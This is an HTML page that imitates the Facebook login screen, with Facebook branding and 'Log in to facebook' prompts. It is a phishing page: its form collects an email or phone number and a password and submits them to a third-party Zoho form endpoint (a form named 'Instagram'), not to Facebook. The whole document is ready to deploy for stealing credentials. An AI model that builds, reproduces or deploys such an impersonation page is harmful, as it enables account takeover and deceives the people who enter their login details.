<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <style>
        body {
            background-color: gainsboro;
        }

        .box {
            border: 2px solid black;
            width: 400px;
            height: 350px;
            margin-left: 700px;
            margin-top: -350px;
            box-shadow: 3px 3px 3px 3px white;
            border: none;
            background-color: white;
            border-radius: 5px;

        }

        button {
            margin-left: 40px;
            margin-top: 60px;
            width: 330px;
            padding: 10px;
            background-color: #3ABEF9;
            color: white;
            font-weight: 900px;
            border: none;
        }

        a {
            color: rgb(7, 160, 225);
            margin-left: 35px;
        }

        p {
            font-family: inherit;
            margin-left: 135px;
        }

        .input {
            margin-left: 20px;
            height: 15px;
            width: 330px;
            padding: 15px;
            border: 1px solid gray;
            border-radius: 5px;
        }

        .heading {
            font-family: inherit;
            color: #3ABEF9;
            margin-left: 100px;
            margin-top: 300px;
            font-size: 60px;
        }

        h3 {
            color: black;
            font-size: 30px;
            margin-left: 100px;
        }
    </style>
</head>

<body>
    <p class="heading">facebook</p>
    <h3>
        Facebook helps you connect and share <br>
        with the people in your life

    </h3>

    <div class="box">
        <form
            action='https://forms.zohopublic.in/sellu6281/form/Instagram/formperma/HUkKEXaQp8q-OuCQ4KXwCJZZrRFrdTUsg0_tRpM2cvM/htmlRecords/submit'
            name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
            <input type="hidden" name="zf_referrer_name"
                value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
            <input type="hidden" name="zf_redirect_url"
                value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
            <input type="hidden" name="zc_gad"
                value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->
            <br>
            <p> Log in to facebook</p>
            <!--Single Line-->
            <br>
            <input class="input" type="text" name="SingleLine" value="" fieldType=1 maxlength="255"
                placeholder="Email address or phone number" />
            <!--Single Line-->
            <br><br>
            <input class="input" type="text" name="SingleLine1" value="" fieldType=1 maxlength="255"
                placeholder="Password" />
            <br>
            <button type="submit"><em>Log in</em></button>
            <br><br>
            <a href="">Forgotten account?</a>&nbsp;&nbsp;
            <a href="">Sign Up for Facebook</a>
        </form>
    </div>
</body>

</html>